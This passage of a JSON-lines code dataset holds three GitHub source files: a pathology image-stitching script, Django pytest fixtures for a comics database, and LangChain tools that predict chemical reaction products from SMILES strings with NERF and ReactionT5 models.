dataset.get_file_by_path('/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images/fold_3/3_high_grade/Grade3_Patient_172_9_grade_3_row_2688_col_4256.png')\n#print(image.shape)\n#cv2.imwrite('ecrc.jpg', image)\n\n\n\n\nif __name__ == '__main__':\n image_path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Images'\n json_path = '/data/smb/syh/PycharmProjects/CGC-Net/data_baiyu/ExCRC/Json/EXtended_CRC_Mask'\n\n image_folder = ImageFolder(image_path)\n image_dataset = ImageDataset(image_folder, 224 * 8)\n image_path, image = image_dataset[44]\n\n\n json_folder = JsonFolder(json_path)\n json_dataset = JsonDataset(json_folder, 224 * 8)\n json_fp = os.path.join(json_path, os.path.basename(image_path).replace('.png', '.json'))\n json_label = json_dataset.get_file_by_path(json_fp)\n\n # image = cv2.resize(image, (0, 0), fx=2, fy=2)\n image = draw_nuclei(image, json_label)\n # image = cv2.resize(image, (0, 0), fx=0.5, fy=0.5)\n cv2.imwrite('aa.jpg', image)\n","repo_name":"suyouooooo/HAT-Net","sub_path":"dataflow/stich.py","file_name":"stich.py","file_ext":"py","file_size_in_byte":23464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"70592669429","text":"import uuid\nfrom datetime import date, datetime\n\nimport pytest\nfrom django.core.management import call_command\nfrom django.utils import timezone\n\nfrom comicsdb.models.arc import Arc\nfrom comicsdb.models.character import Character\nfrom comicsdb.models.creator import Creator\nfrom comicsdb.models.credits import Role\nfrom comicsdb.models.issue import Issue\nfrom comicsdb.models.publisher import Publisher\nfrom comicsdb.models.series import Series, SeriesType\nfrom comicsdb.models.team import Team\nfrom users.models import CustomUser\n\nNUMBER_OF_ISSUES = 35\n\n\n@pytest.fixture()\ndef test_password():\n return \"strong-test-pass\"\n\n\n@pytest.fixture()\ndef test_email():\n return \"foo@bar.com\"\n\n\n@pytest.fixture()\ndef create_user(db, test_password, test_email):\n def make_user(**kwargs):\n kwargs[\"password\"] = test_password\n kwargs[\"email\"] = test_email\n if \"username\" not in kwargs:\n kwargs[\"username\"] = str(uuid.uuid4())\n return CustomUser.objects.create_user(**kwargs)\n\n return make_user\n\n\n@pytest.fixture()\ndef create_staff_user(create_user):\n user: CustomUser = create_user()\n user.is_staff = True\n user.save()\n return user\n\n\n@pytest.fixture()\ndef auto_login_user(db, client, create_user, test_password):\n def make_auto_login(user=None):\n if user is None:\n user = create_user()\n client.login(username=user.username, password=test_password)\n return client, user\n\n return make_auto_login\n\n\n@pytest.fixture()\ndef api_client():\n from rest_framework.test import APIClient\n\n return APIClient()\n\n\n@pytest.fixture()\ndef api_client_with_credentials(db, create_user, api_client):\n user = create_user()\n api_client.force_authenticate(user=user)\n yield api_client\n api_client.force_authenticate(user=None)\n\n\n@pytest.fixture()\ndef api_client_with_staff_credentials(db, create_staff_user, api_client):\n api_client.force_authenticate(user=create_staff_user)\n yield api_client\n api_client.force_authenticate(user=None)\n\n\n@pytest.fixture()\ndef wwh_arc(create_user):\n user = create_user()\n return Arc.objects.create(name=\"World War Hulk\", slug=\"world-war-hulk\", edited_by=user)\n\n\n@pytest.fixture()\ndef fc_arc(create_user):\n user = create_user()\n return Arc.objects.create(name=\"Final Crisis\", slug=\"final-crisis\", edited_by=user)\n\n\n@pytest.fixture()\ndef dc_comics(create_user):\n user = create_user()\n return Publisher.objects.create(name=\"DC Comics\", slug=\"dc-comics\", edited_by=user)\n\n\n@pytest.fixture()\ndef marvel(create_user):\n user = create_user()\n return Publisher.objects.create(name=\"Marvel\", slug=\"marvel\", edited_by=user)\n\n\n@pytest.fixture(scope=\"session\")\ndef django_db_setup(django_db_setup, django_db_blocker):\n with django_db_blocker.unblock():\n call_command(\"loaddata\", \"../fixtures/series_type.yaml\")\n\n\n@pytest.fixture()\ndef cancelled_type(db):\n return SeriesType.objects.get(name=\"Cancelled Series\")\n\n\n@pytest.fixture()\ndef fc_series(create_user, dc_comics, cancelled_type):\n user = create_user()\n return Series.objects.create(\n name=\"Final Crisis\",\n slug=\"final-crisis\",\n publisher=dc_comics,\n volume=\"1\",\n year_began=1939,\n series_type=cancelled_type,\n edited_by=user,\n )\n\n\n@pytest.fixture()\ndef bat_sups_series(create_user, dc_comics, cancelled_type):\n user = create_user()\n return Series.objects.create(\n name=\"Batman / Superman\",\n slug=\"batman-superman\",\n publisher=dc_comics,\n volume=\"1\",\n year_began=2016,\n series_type=cancelled_type,\n edited_by=user,\n )\n\n\n@pytest.fixture()\ndef issue_with_arc(create_user, fc_series, fc_arc, superman):\n user = create_user()\n i = Issue.objects.create(\n series=fc_series,\n number=\"1\",\n slug=\"final-crisis-1\",\n cover_date=timezone.now().date(),\n edited_by=user,\n created_by=user,\n )\n i.arcs.add(fc_arc)\n i.characters.add(superman)\n return i\n\n\n@pytest.fixture()\ndef basic_issue(create_user, fc_series):\n user = create_user()\n return Issue.objects.create(\n series=fc_series,\n number=\"1\",\n slug=\"final-crisis-1\",\n cover_date=timezone.now().date(),\n edited_by=user,\n created_by=user,\n )\n\n\n@pytest.fixture()\ndef list_of_issues(create_user, fc_series):\n user = create_user()\n\n # Create the store date for this week\n year, week, _ = date.today().isocalendar()\n # The \"3\" is the weekday (Wednesday)\n wednesday = f\"{year}-{week}-3\"\n # Dates used in Issue creating\n in_store_date = datetime.strptime(wednesday, \"%G-%V-%u\")\n cover_date = date.today()\n\n for i_num in range(NUMBER_OF_ISSUES):\n Issue.objects.create(\n series=fc_series,\n number=i_num,\n slug=f\"final-crisis-1939-{i_num}\",\n cover_date=cover_date,\n store_date=in_store_date,\n edited_by=user,\n created_by=user,\n )\n\n\n@pytest.fixture()\ndef superman(create_user):\n user = create_user()\n return Character.objects.create(name=\"Superman\", slug=\"superman\", edited_by=user)\n\n\n@pytest.fixture()\ndef batman(create_user):\n user = create_user()\n return Character.objects.create(name=\"Batman\", slug=\"batman\", edited_by=user)\n\n\n@pytest.fixture()\ndef john_byrne(create_user):\n user = create_user()\n return Creator.objects.create(name=\"John Byrne\", slug=\"john-byrne\", edited_by=user)\n\n\n@pytest.fixture()\ndef walter_simonson(create_user):\n user = create_user()\n return Creator.objects.create(\n name=\"Walter Simonson\", slug=\"walter-simonson\", edited_by=user\n )\n\n\n@pytest.fixture()\ndef teen_titans(create_user):\n user = create_user()\n return Team.objects.create(name=\"Teen Titans\", slug=\"teen-titans\", edited_by=user)\n\n\n@pytest.fixture()\ndef avengers(create_user):\n user = create_user()\n return Team.objects.create(name=\"The Avengers\", slug=\"the-avengers\", edited_by=user)\n\n\n@pytest.fixture()\ndef writer(db):\n return Role.objects.create(name=\"Writer\", notes=\"Nothing here.\", order=20)\n","repo_name":"bpepple/metron","sub_path":"comicsdb/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"94"} +{"seq_id":"70838006711","text":"from langchain.tools import BaseTool\nfrom transformers import AutoTokenizer, T5ForConditionalGeneration\nfrom .NERF.preprocess import molecule\nfrom .NERF.model import *\nfrom .NERF.dataset import TransformerDataset\nfrom torch.utils.data import DataLoader\nfrom rdkit import Chem\nfrom .NERF.utils import result2mol\nfrom rdkit import Chem\nimport openai\nimport os\nimport argparse\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import Draw\nfrom rdkit.Chem.Draw import rdMolDraw2D\nfrom rdkit.Chem import rdDepictor\n\nrdDepictor.SetPreferCoordGen(True)\nfrom rdkit.Chem.Draw import IPythonConsole\nfrom IPython.display import SVG\nimport rdkit\n\nparser = argparse.ArgumentParser(description='')\n\ncheck_point = [\"epoch-98-loss-1.1171849480149887\"]\n\nparser.add_argument('--data_path', type=str, help='path of dataset', default='./')\nparser.add_argument('--batch_size', type=int, default=128, help='batch_size.256')\nparser.add_argument('--shuffle', action='store_true', default=False, help='shuffle the order of atoms')\nparser.add_argument('--num_workers', type=int, default=4, help='num workers to generate data.')\nparser.add_argument('--prefix', type=str, default='data',\n help='data prefix')\n\nparser.add_argument('--name', type=str, default='tmp',\n help='model name, crucial for test and checkpoint initialization')\nparser.add_argument('--vae', action='store_true', default=True, help='use vae')\nparser.add_argument('--depth', type=int, default=6, help='depth')\nparser.add_argument('--dim', type=int, default=192, help='dim')\n\nparser.add_argument('--save_path', type=str, default='../tools/NERF/CKPT/no_reactant_mask/', help='path of save prefix')\nparser.add_argument('--train', action='store_true', default=False, help='do training.')\nparser.add_argument('--save', action='store_true', default=True, help='Save model.')\nparser.add_argument('--eval', action='store_true', default=True, help='eval model.')\nparser.add_argument('--test', action='store_true', default=True, help='test model.')\nparser.add_argument('--recon', action='store_true', default=False, help='test reconstruction only.')\n\nparser.add_argument('--seed', type=int, default=2019, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=200, help='Number of epochs to train. 200')\nparser.add_argument('--local_rank', default='cpu', help='rank')\nparser.add_argument('--lr', type=float, default=5e-4, help='Initial learning rate.')\nparser.add_argument('--temperature', type=list, default=[0], nargs='+', help='temperature.')\nparser.add_argument('--dropout', type=float, default=0., help='Dropout rate (1 - keep probability).')\nparser.add_argument('--beta', type=float, default=0.1, help='the weight of kl')\nparser.add_argument('--checkpoint', type=str, default=check_point, nargs='*',\n help='initialize from a checkpoint, if None, do not restore')\nparser.add_argument('--world_size', type=int, default=1, help='number of processes')\n# args = parser.parse_args()\nargs = parser.parse_args(args=[])\n\n\ndef clear_atom_map_smiles(smiles_with_atom_map):\n mol = Chem.MolFromSmiles(smiles_with_atom_map)\n for atom in mol.GetAtoms():\n atom.ClearProp('molAtomMapNumber')\n return Chem.MolToSmiles(mol)\n\n\ndef need_atom_mapping(smiles):\n mol = Chem.MolFromSmiles(smiles)\n\n if mol is None:\n return True\n\n for atom in mol.GetAtoms():\n atom_map_num = atom.GetAtomMapNum()\n if atom_map_num != 0:\n return False\n return True\n\n\nclass NERF_non_reactant_mask(BaseTool):\n name = 'NERF_non_reactant_mask'\n description = (\n 'Use NERF_non_reactant_mask tool to Predict the product of a chemical reaction when only reactants are known and the reagents are unknown. ' +\n ' input SMILES string only, output the change of bonds and the SMILES of predicted products')\n checkpoint = \"epoch-98-loss-1.1171849480149887\"\n\n def map_atoms_in_smiles(self, smiles):\n mol = Chem.MolFromSmiles(smiles)\n\n if mol is None:\n return None\n\n atom_map = {}\n for atom in mol.GetAtoms():\n atom.SetAtomMapNum(atom.GetIdx() + 1)\n atom_map[atom.GetIdx()] = atom.GetIdx() + 1\n\n mapped_smiles = Chem.MolToSmiles(mol, canonical=True, isomericSmiles=True)\n return mapped_smiles\n\n def process_smiles(self, smiles, reactant_mask=None):\n # 需要原子映射处理, map_atoms=True\n # reactant_mask 是长度为“分子个数”的list, 1 for reactant, 0 for reagent\n map_atoms = need_atom_mapping(smiles)\n if map_atoms:\n smiles_atom_mapped = self.map_atoms_in_smiles(smiles)\n smiles_no_atom_mapped = smiles\n else:\n smiles_no_atom_mapped = clear_atom_map_smiles(smiles)\n smiles_atom_mapped = smiles\n\n reactant_mols = [Chem.MolFromSmiles(item) for item in smiles_atom_mapped.split(\".\")]\n reactant_len = Chem.MolFromSmiles(smiles_atom_mapped).GetNumAtoms()\n\n reactant_features = molecule(reactant_mols, reactant_len, reactant_mask)\n\n element = reactant_features['element']\n mask = reactant_features['mask']\n bond = reactant_features['bond']\n aroma = reactant_features['aroma']\n charge = reactant_features['charge']\n\n input_data = {}\n for key in reactant_features:\n if key in [\"element\", \"reactant\"]:\n input_data[key] = reactant_features[key]\n else:\n input_data['src_' + key] = reactant_features[key]\n\n data = [input_data]\n\n full_dataset = TransformerDataset(False, data)\n\n data_loader = DataLoader(full_dataset,\n batch_size=1,\n num_workers=4, collate_fn=TransformerDataset.collate_fn)\n\n return data_loader, element, mask, bond, aroma, charge, smiles_atom_mapped, smiles_no_atom_mapped\n\n def init_model(self, save_path, checkpoint):\n state_dict = {}\n map_location = {'cuda:%d' % 0: 'cuda:%d' % 0}\n checkpoint = torch.load(os.path.join(save_path, checkpoint), map_location=map_location)\n for key in checkpoint['model_state_dict']:\n if key in state_dict:\n state_dict[key] += checkpoint['model_state_dict'][key]\n else:\n state_dict[key] = checkpoint['model_state_dict'][key]\n\n model = MoleculeVAE(args, 100, 192, 6).to('cpu') # TODO\n model.load_state_dict(state_dict)\n\n return model\n\n def predict(self, data_loader,\n save_path='../chemagent/tools/NERF/CKPT/no_reactant_mask/tmp/', checkpoint=checkpoint, temperature=0):\n\n model = self.init_model(save_path, checkpoint)\n\n for data in data_loader: # 只有1个\n data_gpu = {}\n for key in data:\n data_gpu[key] = data[key].to('cpu')\n\n predicted_dict = model('sample', data_gpu, temperature)\n\n element = data['element']\n src_mask = data['src_mask']\n pred_bond = predicted_dict['bond'].cpu()\n pred_aroma, pred_charge = predicted_dict['aroma'].cpu(), predicted_dict['charge'].cpu()\n\n arg_list = [(element[j], src_mask[j], pred_bond[j], pred_aroma[j], pred_charge[j], None) for j in\n range(1)]\n\n res = map(result2mol, arg_list)\n res = list(res)\n\n for item in res:\n mol, smile, valid, smile_no_map = item[0], item[1], item[2], item[3]\n\n return mol, smile, valid, pred_bond, pred_aroma, pred_charge, smile_no_map\n\n def pred_from_smiles(self, smiles,\n reactant_mask=None): # TODO: return mol_ori(atom_mapping & same idx with element) and mol_pred\n # processed_smile是一个经过了原子映射的smile\n dl, element, src_mask, src_bond, src_aroma, src_charge, smile_atom_map, smile_no_atom_map = self.process_smiles(\n smiles, reactant_mask)\n arg_list_src = [(element, src_mask, src_bond, src_aroma, src_charge, None)]\n result_src = map(result2mol, arg_list_src)\n result_src = list(result_src)\n mol_ori = None\n for item in result_src:\n mol_ori = item[0]\n src_mol_adj = Chem.GetAdjacencyMatrix(mol_ori)\n\n mol_pred, pred_smile_atom_mapping, pred_valid, pred_bond, pred_aroma, pred_charge, pred_smile_no_atom_map = self.predict(\n dl)\n\n pred_mol_adj = Chem.GetAdjacencyMatrix(mol_pred)\n diff_adj = pred_mol_adj - src_mol_adj\n\n return smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj, \\\n mol_ori, mol_pred\n\n def get_reaction_info(self, elements, diff):\n element_symbols = [\"H\", \"He\", \"Li\", \"Be\", \"B\", \"C\", \"N\", \"O\", \"F\", \"Ne\", \"Na\", \"Mg\", \"Al\", \"Si\", \"P\", \"S\", \"Cl\",\n \"Ar\", \"K\", \"Ca\", \"Sc\", \"Ti\", \"V\", \"Cr\", \"Mn\", \"Fe\", \"Ni\", \"Co\", \"Cu\", \"Zn\", \"Ga\", \"Ge\", \"As\",\n \"Se\", \"Br\", \"Kr\", \"Rb\", \"Sr\", \"Y\", \"Zr\", \"Nb\", \"Mo\", \"Tc\", \"Ru\", \"Rh\", \"Pd\", \"Ag\", \"Cd\",\n \"In\", \"Sn\", \"Sb\", \"Te\", \"I\", \"Xe\", \"Cs\", \"Ba\", \"La\", \"Ce\", \"Pr\", \"Nd\", \"Pm\", \"Sm\", \"Eu\",\n \"Gd\", \"Tb\", \"Dy\", \"Ho\", \"Er\", \"Tm\", \"Yb\", \"Lu\", \"Hf\", \"Ta\", \"W\", \"Re\", \"Os\", \"Ir\", \"Pt\",\n \"Au\", \"Hg\", \"Tl\", \"Pb\", \"Bi\", \"Po\", \"At\", \"Rn\", \"Fr\", \"Ra\", \"Ac\", \"Th\", \"Pa\", \"U\", \"Np\",\n \"Pu\", \"Am\", \"Cm\", \"Bk\", \"Cf\", \"Es\", \"Fm\", \"Md\", \"No\", \"Lr\", \"Rf\", \"Db\", \"Sg\", \"Bh\", \"Hs\",\n \"Mt\", \"Ds\", \"Rg\", \"Cn\", \"Nh\", \"Fl\", \"Mc\", \"Lv\", \"Ts\", \"Og\"]\n\n reaction_info = []\n\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] >= 1:\n reaction_info.append(\n f\"Formation of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n elif diff[i][j] <= -1:\n reaction_info.append(\n f\"Breaking of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n\n return reaction_info\n\n def draw_reaction_graph(self, mol_ori, mol_pred, diff, pic_name_ori):\n\n # for mol_ori: highlight the bonds that are broken\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] == -1:\n mol_ori.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Broken\")\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n d2d.drawOptions().addAtomIndices = True\n d2d.drawOptions().setHighlightColour((0.8, 0.8, 0.8))\n d2d.DrawMolecule(mol_ori, highlightAtoms=[], highlightBonds=[0, 1])\n d2d.FinishDrawing()\n svg = d2d.GetDrawingText()\n with open('../tests/image/' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n # for mol_pred: highlight the bonds that are formed\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] == 1:\n mol_pred.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Formed\")\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n d2d.drawOptions().addAtomIndices = True\n d2d.drawOptions().setHighlightColour((0.8, 0.8, 0.8))\n d2d.DrawMolecule(mol_pred, highlightAtoms=[], highlightBonds=[0, 1])\n d2d.FinishDrawing()\n # SVG(d2d.GetDrawingText())\n svg = d2d.GetDrawingText()\n with open('../tests/image/' + 'predicted products of' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n def _run(self, reactants_smile: str) -> str:\n # smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj\n reactant_mask = None\n smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_mapping, src_element, diff_, \\\n mol_ori, mol_pred = self.pred_from_smiles(reactants_smile, reactant_mask=reactant_mask)\n explain = self.get_reaction_info(src_element, diff_)\n self.draw_reaction_graph(mol_ori, mol_pred, diff_, smile_no_atom_map)\n return '\\n'.join(['reactants SMILES:' + smile_no_atom_map,\n 'reactants after atom mapping:' + smile_atom_map,\n 'predicted products with atom mapping:' + pred_smile_atom_mapping,\n 'predicted products without atom mapping:' + pred_smile_no_atom_mapping,\n 'Changes in Covalent Bonds in Reactions'\n ] + explain)\n\n\nclass ReactionT5(BaseTool):\n name = 'reaction_t5'\n description = ('Predict the product of a chemical reaction')\n\n def __init__(self, model_name=\"t5-large\", verbose=False):\n super().__init__(verbose=verbose)\n self.model_name = model_name\n self.tokenizer = AutoTokenizer.from_pretrained('sagawa/ReactionT5-product-prediction')\n self.model = T5ForConditionalGeneration.from_pretrained('sagawa/ReactionT5-product-prediction')\n\n def _run(self, input_smiles: str) -> str:\n inp = self.tokenizer(f'REACTANT:{input_smiles}REAGENT:', return_tensors='pt')\n output = self.model.generate(**inp, min_length=6, max_length=109, num_beams=1, num_return_sequences=1,\n return_dict_in_generate=True, output_scores=True)\n output = self.tokenizer.decode(output['sequences'][0], skip_special_tokens=True).replace(' ', '').rstrip('.')\n return output\n\n async def _arun(self, smiles_pair: str) -> str:\n \"\"\"Use the tool asynchronously.\"\"\"\n raise NotImplementedError()\n\n\nclass NERF_know_reagents(BaseTool):\n name = 'NERF_know_reagents'\n description = (\n 'Given the reactants and reagents (where reagents can be None) of a chemical reaction, Predict the product of a chemical ' +\n 'reaction. Input SMILES string of reactants and reagents separately, output the change of bonds ' +\n 'and the SMILES of predicted products.' +\n 'Strictly follow the input format, this is an example of input:\"Reactants:CS(=O)(=O)OC[C@H]1CCC(=O)O1 Reagents:Fc1ccc(Nc2ncnc3cc(OCCN4CCNCC4)c(OC4CCCC4)cc23)cc1Cl\"' +\n 'You should replace the SMILES string with your own targeted SMILES string that given in the question.')\n # checkpoint = \"epoch-232-loss-0.5991340563215058\"\n # checkpoint = \"epoch-171-loss-0.6919782893504469\"\n checkpoint = \"epoch-199-loss-0.5907546520840412\"\n def map_atoms_in_smiles(self, smiles):\n mol = Chem.MolFromSmiles(smiles)\n\n if mol is None:\n return None\n\n atom_map = {}\n for atom in mol.GetAtoms():\n atom.SetAtomMapNum(atom.GetIdx() + 1)\n atom_map[atom.GetIdx()] = atom.GetIdx() + 1\n\n mapped_smiles = Chem.MolToSmiles(mol, canonical=True, isomericSmiles=True)\n return mapped_smiles\n\n def process_smiles(self, smiles, reactant_mask):\n # 需要原子映射处理, map_atoms=True\n # reactant_mask 是长度为“分子个数”的list, 1 for reactant, 0 for reagent\n map_atoms = need_atom_mapping(smiles)\n if map_atoms:\n smiles_atom_mapped = self.map_atoms_in_smiles(smiles)\n smiles_no_atom_mapped = smiles\n else:\n smiles_no_atom_mapped = clear_atom_map_smiles(smiles)\n smiles_atom_mapped = smiles\n\n reactant_mols = [Chem.MolFromSmiles(item) for item in smiles_atom_mapped.split(\".\")]\n reactant_len = Chem.MolFromSmiles(smiles_atom_mapped).GetNumAtoms()\n\n reactant_features = molecule(reactant_mols, reactant_len, reactant_mask)\n\n element = reactant_features['element']\n mask = reactant_features['mask']\n bond = reactant_features['bond']\n aroma = reactant_features['aroma']\n charge = reactant_features['charge']\n\n input_data = {}\n for key in reactant_features:\n if key in [\"element\", \"reactant\"]:\n input_data[key] = reactant_features[key]\n else:\n input_data['src_' + key] = reactant_features[key]\n\n data = [input_data]\n\n full_dataset = TransformerDataset(False, data)\n\n data_loader = DataLoader(full_dataset,\n batch_size=1,\n num_workers=4, collate_fn=TransformerDataset.collate_fn)\n\n return data_loader, element, mask, bond, aroma, charge, smiles_atom_mapped, smiles_no_atom_mapped\n\n def init_model(self, save_path, checkpoint):\n state_dict = {}\n map_location = {'cuda:%d' % 0: 'cuda:%d' % 0}\n checkpoint = torch.load(os.path.join(save_path, checkpoint), map_location=map_location)\n for key in checkpoint['model_state_dict']:\n if key in state_dict:\n state_dict[key] += checkpoint['model_state_dict'][key]\n else:\n state_dict[key] = checkpoint['model_state_dict'][key]\n\n model = MoleculeVAE(args, 100, 192, 6).to('cpu') # TODO\n model.load_state_dict(state_dict)\n\n return model\n\n def predict(self, data_loader,\n save_path='../chemagent/tools/NERF/CKPT/', checkpoint=checkpoint, temperature=0):\n\n model = self.init_model(save_path, checkpoint)\n\n for data in data_loader: # 只有1个\n data_gpu = {}\n for key in data:\n data_gpu[key] = data[key].to('cpu')\n\n predicted_dict = model('sample', data_gpu, temperature)\n\n element = data['element']\n src_mask = data['src_mask']\n pred_bond = predicted_dict['bond'].cpu()\n pred_aroma, pred_charge = predicted_dict['aroma'].cpu(), predicted_dict['charge'].cpu()\n\n arg_list = [(element[j], src_mask[j], pred_bond[j], pred_aroma[j], pred_charge[j], None) for j in\n range(1)]\n\n res = map(result2mol, arg_list)\n res = list(res)\n\n for item in res:\n mol, smile, valid, smile_no_map, adj_matrix_pred = item[0], item[1], item[2], item[3], item[4]\n\n return mol, smile, valid, pred_bond, pred_aroma, pred_charge, smile_no_map, adj_matrix_pred\n\n def pred_from_reactants_reagents(self, reactants, reagents):\n # processed_smile是一个经过了原子映射的smile\n smiles = '.'.join([reactants, reagents])\n if reagents is not None:\n reactant_mask = [1 for _ in reactants.split('.')] + [0 for _ in reagents.split('.')]\n else:\n reactant_mask = [1 for _ in reactants.split('.')]\n dl, element, src_mask, src_bond, src_aroma, src_charge, smile_atom_map, smile_no_atom_map = self.process_smiles(\n smiles, reactant_mask)\n arg_list_src = [(element, src_mask, src_bond, src_aroma, src_charge, None)]\n result_src = map(result2mol, arg_list_src)\n result_src = list(result_src)\n for item in result_src:\n mol_ori = item[0]\n adj_matrix_ori = item[4]\n src_mol_adj = Chem.GetAdjacencyMatrix(item[0]) # TODO check this; result2mol 返回 adj_matrix_ori, predict函数返回adj_matrix_pred\n\n pred_mol, pred_smile_atom_mapping, pred_valid, pred_bond, pred_aroma, pred_charge, pred_smile_no_atom_map, adj_matrix_pred = self.predict(\n dl)\n\n pred_mol_adj = Chem.GetAdjacencyMatrix(pred_mol)\n diff_adj = adj_matrix_pred.adj_matrix.numpy() - adj_matrix_ori.adj_matrix.numpy()\n\n return smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj, \\\n mol_ori, pred_mol\n\n def get_reaction_info(self, elements, diff):\n element_symbols = [\"H\", \"He\", \"Li\", \"Be\", \"B\", \"C\", \"N\", \"O\", \"F\", \"Ne\", \"Na\", \"Mg\", \"Al\", \"Si\", \"P\", \"S\", \"Cl\",\n \"Ar\", \"K\", \"Ca\", \"Sc\", \"Ti\", \"V\", \"Cr\", \"Mn\", \"Fe\", \"Ni\", \"Co\", \"Cu\", \"Zn\", \"Ga\", \"Ge\", \"As\",\n \"Se\", \"Br\", \"Kr\", \"Rb\", \"Sr\", \"Y\", \"Zr\", \"Nb\", \"Mo\", \"Tc\", \"Ru\", \"Rh\", \"Pd\", \"Ag\", \"Cd\",\n \"In\", \"Sn\", \"Sb\", \"Te\", \"I\", \"Xe\", \"Cs\", \"Ba\", \"La\", \"Ce\", \"Pr\", \"Nd\", \"Pm\", \"Sm\", \"Eu\",\n \"Gd\", \"Tb\", \"Dy\", \"Ho\", \"Er\", \"Tm\", \"Yb\", \"Lu\", \"Hf\", \"Ta\", \"W\", \"Re\", \"Os\", \"Ir\", \"Pt\",\n \"Au\", \"Hg\", \"Tl\", \"Pb\", \"Bi\", \"Po\", \"At\", \"Rn\", \"Fr\", \"Ra\", \"Ac\", \"Th\", \"Pa\", \"U\", \"Np\",\n \"Pu\", \"Am\", \"Cm\", \"Bk\", \"Cf\", \"Es\", \"Fm\", \"Md\", \"No\", \"Lr\", \"Rf\", \"Db\", \"Sg\", \"Bh\", \"Hs\",\n \"Mt\", \"Ds\", \"Rg\", \"Cn\", \"Nh\", \"Fl\", \"Mc\", \"Lv\", \"Ts\", \"Og\"]\n\n reaction_info = []\n\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] == 1:\n reaction_info.append(\n f\"Formation of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n elif diff[i][j] == -1:\n reaction_info.append(\n f\"Breaking of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n\n return reaction_info\n\n def draw_reaction_graph1(self, mol_ori, mol_pred, diff, pic_name_ori):\n # for mol_ori: highlight the bonds that are broken\n bond_hilights_ori = []\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] == -1:\n mol_ori.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Broken\")\n bond_hilights_ori.append(mol_ori.GetBondBetweenAtoms(i, j).GetIdx())\n\n # for mol_pred: highlight the bonds that are formed\n bond_hilights_pred = []\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] == 1:\n mol_pred.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Formed\")\n bond_hilights_pred.append(mol_pred.GetBondBetweenAtoms(i, j).GetIdx())\n\n # Create an RDKit Mol object for the second molecule\n mol_pred_highlighted = Chem.Mol(mol_pred)\n\n # Highlight bonds in the second molecule\n for bond_idx in bond_hilights_pred:\n mol_pred_highlighted.GetBondWithIdx(bond_idx).SetProp(\"bondNote\", \"Formed\")\n\n # Create an RDKit Mol object for the first molecule\n mol_ori_highlighted = Chem.Mol(mol_ori)\n\n # Highlight bonds in the first molecule\n for bond_idx in bond_hilights_ori:\n mol_ori_highlighted.GetBondWithIdx(bond_idx).SetProp(\"bondNote\", \"Broken\")\n\n # Create a grid image with both molecules and their highlights\n img = Draw.MolsToGridImage([mol_ori_highlighted, mol_pred_highlighted],\n molsPerRow=2, subImgSize=(200, 200),\n legends=['Original', 'Predicted'],\n useSVG=True)\n with open('../tests/image/' + '1reaction:' + pic_name_ori + '.svg', 'w') as f:\n f.write(img.data)\n # img.save('../tests/image/' + 'reaction_comparison_highlighted_' + pic_name_ori + '.png')\n\n def draw_reaction_graph(self, mol_ori, mol_pred, reagents_smiles, diff, pic_name_ori):\n if len(pic_name_ori) > 20:\n pic_name_ori = pic_name_ori[:20]\n\n # reagents_mol = Chem.MolFromSmiles(reagents_smiles)\n ori_smiles = Chem.MolToSmiles(mol_ori).split('.')\n pred_smiles = Chem.MolToSmiles(mol_pred).split('.')\n reagents_smiles = []\n for o in ori_smiles:\n if o in pred_smiles:\n reagents_smiles.append(o)\n\n reagents_smiles = Chem.MolFromSmiles('.'.join(reagents_smiles))\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n d2d.drawOptions().setHighlightColour((1.0, 0.5, 0.0))\n d2d.DrawMolecule(reagents_smiles)\n d2d.FinishDrawing()\n svg = d2d.GetDrawingText()\n with open('../tests/image/reagents_' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n # for mol_ori: highlight the bonds that are broken\n bond_hilights = []\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] <= -1:\n mol_ori.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Broken\")\n bond_hilights.append(mol_ori.GetBondBetweenAtoms(i, j).GetIdx())\n\n atom_hilights_ori = [i for i in range(len(mol_ori.GetAtoms())) if\n any(diff[i][j] <= -1 for j in range(len(diff)))]\n\n mol_ori = Chem.DeleteSubstructs(mol_ori, reagents_smiles, onlyFrags=True)\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n 